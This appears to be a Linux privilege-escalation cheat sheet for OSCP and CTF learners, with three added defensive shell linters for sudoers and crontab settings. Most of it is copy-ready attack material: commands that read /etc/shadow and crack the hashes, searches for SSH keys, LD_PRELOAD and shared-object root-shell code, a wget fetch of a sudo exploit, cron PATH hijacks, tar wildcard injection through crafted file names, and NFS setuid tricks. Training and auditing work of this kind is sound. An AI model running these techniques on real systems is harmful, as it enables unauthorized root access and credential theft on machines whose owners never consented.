Linux privilege escalation cheat sheet


This cheatsheet is aimed at the OSCP aspirants to help them understand the various methods of Escalating Privilege on Linux based Machines and CTFs with examples.

Ignitetechnologies/Linux-Privilege-Escalation


Linux Privilege Escalation Cheatsheet

This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples. There are multiple ways to perform the same task. We have performed and compiled this list based on our experience. Please share this with your connections and direct queries and feedback to Hacking Articles.


  1. Abusing Sudo Rights
  2. SUID Binaries
  3. Capabilities
  4. LXD Privilege Escalation
  5. Docker Privilege Escalation
  6. Exploiting Cron Jobs
  7. Writable /etc/passwd File
  8. Misconfigured NFS
  9. Exploiting Wildcards
  10. LD_PRELOAD Privilege Escalation
  11. Exploiting the PATH Variable
  12. Python Library Hijacking
  13. Polkit (CVE-2021-3560)
  14. PwnKit (CVE-2021-4034)
  15. DirtyPipe (CVE-2022-0847)



Linux Privilege Escalation Cheat Sheet

hostname
uname -a
cat /proc/version
cat /etc/issue
lscpu
whoami
id
sudo -l
cat /etc/passwd
cat /etc/passwd | cut -d : -f 1
cat /etc/shadow
cat /etc/group
ifconfig
ip a
ip route
arp -a
ip neigh

Kernel Exploit Enumeration

hostname
uname -a
cat /etc/lsb-release
cat /proc/version
cat /etc/os-release
cat /etc/issue
lscpu

Check Running Process Information

Kernel Exploitation Process

  1. Google for Exploits against the OS and Kernel Version
  2. Download, compile, and run it against the target if it exists
  3. Try something else if it does not exist.

Escalation via Password & File Permissions

A password may be stored in the bash history or in other files; search for it:

grep --color=always -rnw '/' -ie "PASSW" 2> /dev/null
find . -type f -exec grep -i -I "PASSW" {} /dev/null \;

Check the permissions on, and the contents of, the password and shadow files:

ls -la /etc/passwd
ls -la /etc/shadow
cat /etc/passwd
cat /etc/shadow

If both files are readable, combine them and crack the hashes (hash types are listed at https://hashcat.net/wiki/doku.php?id=example_hashes):

unshadow <passwd_file> <shadow_file>
.\hashcat64.exe -m <hash_type> <unshadowed_file> .\rockyou.txt -O

Look for SSH keys:

find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
  1. Research GTFOBins for the binary
  2. If nothing is found, search for a root privilege escalation for that binary

shell.c:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=<path/to/shell.so> <binary we can run as sudo>
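Added defender-side check, not part of the original cheat sheet: sudo's default env_reset strips LD_* variables, so the LD_PRELOAD route above depends on a sudoers setting that lets the variable through. The function below (sudoers_env_lint is my name, not a sudo tool) lints a sudoers-format file for env_keep entries that whitelist LD_*, a disabled env_reset, and the SETENV tag; the sample rules in the test are constructed.

```shell
#!/bin/sh
# Added defender-side check, not part of the original cheat sheet.
# sudo's default env_reset drops LD_* variables before running a command, so
# the LD_PRELOAD technique depends on a sudoers setting that lets the variable
# through. This lints a sudoers-format file for three such settings:
#   - env_keep entries that whitelist LD_PRELOAD, LD_LIBRARY_PATH or LD_*
#   - "!env_reset" in a Defaults line
#   - a SETENV: tag, which lets the caller pass VAR=value on the command line
# Exit status 0 = clean, 1 = at least one FINDING line printed.
sudoers_env_lint() {
  file=$1; rc=0
  # Drop comments so a commented-out rule is not reported.
  rules=$(sed 's/#.*//' "$file")
  hits=$(printf '%s\n' "$rules" | grep -E 'env_keep.*LD_(PRELOAD|LIBRARY_PATH|\*)' || true)
  if [ -n "$hits" ]; then printf 'FINDING env_keep passes LD_* through: %s\n' "$hits"; rc=1; fi
  hits=$(printf '%s\n' "$rules" | grep -E '^[[:space:]]*Defaults.*!env_reset' || true)
  if [ -n "$hits" ]; then printf 'FINDING env_reset disabled: %s\n' "$hits"; rc=1; fi
  hits=$(printf '%s\n' "$rules" | grep -E '(^|[[:space:](,])SETENV:' || true)
  if [ -n "$hits" ]; then printf 'FINDING SETENV tag lets caller set variables: %s\n' "$hits"; rc=1; fi
  return $rc
}
# Typical use (reading the files needs root): sudoers_env_lint /etc/sudoers
```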
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c -O exploit.c
find / -perm -u=s -type f 2>/dev/null
  1. Check GTFOBins for SUID and find a suitable binary
  2. Run the code associated with the binary and SUID
find / -type f -perm -04000 -ls 2>/dev/null
strace <path/to/binary> 2>&1 | grep -i -E "open|access|no such file"

exploit.c (a shared object compiled to the path of a library the binary tried and failed to open):

#include <stdio.h>
#include <stdlib.h>

static void inject(void) __attribute__((constructor));

static void inject(void) {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

gcc -shared -fPIC -o <path/to/opened/file_found_with_strace> <path/to/exploit.c>

Binary Symlinks in nginx with CVE-2016-1247

find / -type f -perm -04000 -ls 2>/dev/null
  1. Run the Linux Exploit Suggester
  2. Find CVE-2016-1247
  3. Check the nginx log files for rwx in the folder
./nginxed-root.sh /var/log/nginx/error.log
find / -type f -perm -04000 -ls 2>/dev/null
  1. Run the binary and check its strings; if it calls the service by name only, continue; if it calls the full path, skip to step 6
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
function <name of service>() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f <name of service>

Escalation via Capabilities

  1. Find binaries with cap_setuid+ep
  2. Check GTFObins for Capabilities
  3. Run the command found in GTFObins
<path of binary> <command to root>

Escalation via Scheduled Tasks

cat /etc/crontab
crontab -l
ls -lah /var/spool/cron
ls -lah /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
systemctl list-timers --all

Escalation via Cron Paths

  1. Check the PATH= variable.
  2. Check which files are being run.
  3. Check whether the file exists in each PATH directory, from left to right.
  4. If it does not exist in an earlier directory and you can write there, create the file with:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > <writable PATH dir>/<file name>
chmod +x <writable PATH dir>/<file name>
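Added audit helper for the procedure above, not part of the original cheat sheet: given the PATH= value from a crontab and a bare command name from a cron line, cron_path_audit (my name) walks PATH left to right as steps 1 to 3 describe, reports where the command resolves, and flags any directory searched before it that is group- or world-writable, which is the condition step 4 looks for. The directory layout in the test is constructed.

```shell
#!/bin/sh
# Added audit helper, not part of the original cheat sheet. Walks a crontab
# PATH value left to right the way cron resolves a bare command name and
# flags directories searched *before* the real one that are group- or
# world-writable: a file planted there would shadow the intended command.
# Prints RESOLVED / WRITABLE_BEFORE_RESOLUTION / MISSING_DIR / NOT_FOUND lines.
# Exit status: 0 clean, 1 writable directory found, 2 command not found.
cron_path_audit() {
  cron_path=$1; cmd=$2; resolved=""; rc=0
  old_ifs=$IFS; IFS=:
  set -- $cron_path           # split PATH on ':' into positional parameters
  IFS=$old_ifs
  for dir in "$@"; do
    [ -n "$dir" ] || dir=.    # an empty PATH element means the current directory
    if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
      resolved=$dir/$cmd
      echo "RESOLVED $resolved"
      break                   # later directories are never consulted
    fi
    if [ -d "$dir" ]; then
      # Permission string such as drwxrwxr-x: char 6 is group write, char 9 is other write.
      mode=$(ls -ld "$dir" | cut -c1-10)
      case $mode in
        ?????w*|????????w*)
          echo "WRITABLE_BEFORE_RESOLUTION $dir ($mode)"; rc=1 ;;
      esac
    else
      echo "MISSING_DIR $dir"   # whoever can create it decides what $cmd runs
    fi
  done
  if [ -z "$resolved" ]; then echo "NOT_FOUND $cmd"; return 2; fi
  return $rc
}
# Example against the live system crontab (output depends on the host):
# cron_path_audit "$(sed -n 's/^PATH=//p' /etc/crontab)" backup.sh
```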

If a command accepts wildcards as an argument and it is present in the crontab or cronjob do the following:

  1. Research the executable
  2. Create files whose names are fed as part of the argument
  3. The executable will interpret the file name as part of the command
  4. Profit

tar is a good example of this, with the payloads:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > root.sh
chmod +x root.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh root.sh"

When a backup is done, the files are interpreted as tar arguments.
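Added defender-side check, not part of the original cheat sheet: crontab_wildcard_lint (my name) scans crontab lines for the pattern the wildcard section relies on, a tool that reads long options from its operands run on a bare shell wildcard without a "--" separator. tar is the page's example; rsync, chown and chmod are other common tools with the same behaviour, and the sample crontab lines in the test are constructed.

```shell
#!/bin/sh
# Added defender-side check, not part of the original cheat sheet: lint crontab
# lines for a tool that reads long options from its operands, run on a bare
# shell wildcard without a "--" separator. tar is the example in the text;
# rsync, chown and chmod are other common tools with the same behaviour.
# The fix is "--" before the wildcard, or an explicit file list.
# Exit status 0 = clean, 1 = at least one FINDING line printed.
RISKY_TOOLS='tar|rsync|chown|chmod'

crontab_wildcard_lint() {
  file=$1; skip=${2:-6}; rc=0   # 6 leading fields in /etc/crontab (5 time + user), 5 in a user crontab
  pat="(^|[[:space:];|&/])($RISKY_TOOLS)[[:space:]][^;|&]*\\*"
  while IFS= read -r line; do
    case $line in
      ''|'#'*|[A-Za-z_]*=*) continue ;;   # blank, comment, or VAR=value line
    esac
    # Drop the schedule (and user) fields so the '*' in them are not mistaken for wildcards.
    cmd=$(printf '%s\n' "$line" | awk -v n="$skip" '{ for (i = 1; i <= n; i++) $i = ""; sub(/^ +/, ""); print }')
    case " $cmd " in
      *" -- "*) continue ;;   # "--" ends option parsing, so operands cannot become options
    esac
    if printf '%s\n' "$cmd" | grep -Eq "$pat"; then
      echo "FINDING: $cmd"; rc=1
    fi
  done < "$file"
  return $rc
}
# Typical use: crontab_wildcard_lint /etc/crontab 6; crontab -l > /tmp/ct && crontab_wildcard_lint /tmp/ct 5
```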

mkdir /tmp/mount
mount -o rw,vers=2 <IP>:<mount> /tmp/mount
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/mount/exploit.c
gcc /tmp/mount/exploit.c -o /tmp/mount/exploit
chmod +s /tmp/mount/exploit
